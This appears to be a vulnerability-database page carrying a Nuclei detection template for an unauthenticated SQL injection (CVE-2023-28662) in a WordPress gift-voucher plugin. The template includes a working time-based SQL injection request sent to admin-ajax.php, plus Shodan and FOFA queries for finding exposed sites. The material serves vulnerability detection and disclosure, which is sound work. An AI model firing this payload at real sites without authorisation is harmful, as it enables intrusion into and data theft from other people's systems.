Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-28662
HistoryFeb 04, 2024 - 10:48 a.m.

Wordpress Gift Cards <= 4.3.1 - SQL Injection

2024-02-0410:48:42
ProjectDiscovery
github.com
47
cve
wordpress
wp-plugin
sql-injection
unauthenticated
gift-voucher

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.019

Percentile

88.6%

The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version &lt;= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
id: CVE-2023-28662

info:
  name: Wordpress Gift Cards <= 4.3.1 - SQL Injection
  author: xxcdd
  severity: critical
  description: |
    The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
  reference:
    - https://www.tenable.com/security/research/tra-2023-2
    - https://wordpress.org/plugins/gift-voucher/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28662
    cwe-id: CWE-89
    epss-score: 0.01065
    epss-percentile: 0.8414
    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codemenschen
    product: gift_vouchers
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
    fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Gift Vouchers and Packages'

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=

    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 500
          - contains(body, 'critical error')
        condition: and
# digest: 4a0a00473045022100f5944d195a66cc992aa9390c7b6af64403ba94d5415a81b46c6e677979a6341302201fe366b008369ca7e2ec4a8c9d37a12ad2a6c12a4080682b3edb135e95b6e16a:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.019

Percentile

88.6%